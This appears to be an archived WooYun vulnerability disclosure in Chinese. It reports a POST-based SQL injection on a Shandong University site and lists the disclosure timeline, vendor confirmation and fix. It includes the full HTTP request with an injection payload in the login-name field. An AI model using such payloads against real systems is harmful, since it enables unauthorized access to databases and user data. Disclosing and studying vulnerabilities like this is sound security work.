乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-16: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-26: 细节向核心白帽子及相关领域专家公开 2015-11-05: 细节向普通白帽子公开 2015-11-10: 厂商已经修复漏洞并主动公开,细节向公众公开
山东大学某站一处POST型SQL注入
1、山东大学某站(GSP:加拿大高等教育基础部)一处POST型SQL注入,URL:
http://gsp.sdu.edu.cn
2、POST包如下:
POST /bsuims/bsMainFrameInit.do HTTP/1.1Content-Length: 1297Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_DJJNLSAJDQX-Requested-With: XMLHttpRequestReferer: http://gsp.sdu.edu.cnCookie: JSESSIONID=540EB07FA2B9B3F624DFC51E644A9181Host: gsp.sdu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_KBCNEOMLEG-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="contextName"gspmsLoginPage-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="contextPara"null-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="contextPath"-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="controlType"frame-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="getPasswordAction"############-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="itemName"loginAction-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="loginAction"######-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="login_autoLoginCheckbox"1-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="login_strLoginName"-1' OR 1=1* AND 000424=000424 or '83izvbDa'='-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="login_strPassword"g00dPa$$w0rD-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="registration"######-------AcunetixBoundary_KBCNEOMLEGContent-Disposition: form-data; name="sectionName"login-------AcunetixBoundary_KBCNEOMLEG--
3、login_strLoginName参数有问题:
4、取下当前库、当前用户:
过滤。。。挖个洞不容易,多给点rank吧,谢谢!
危害等级:高
漏洞Rank:10
确认时间:2015-10-16 22:18
已通报系统所属单位
2015-11-10:已修复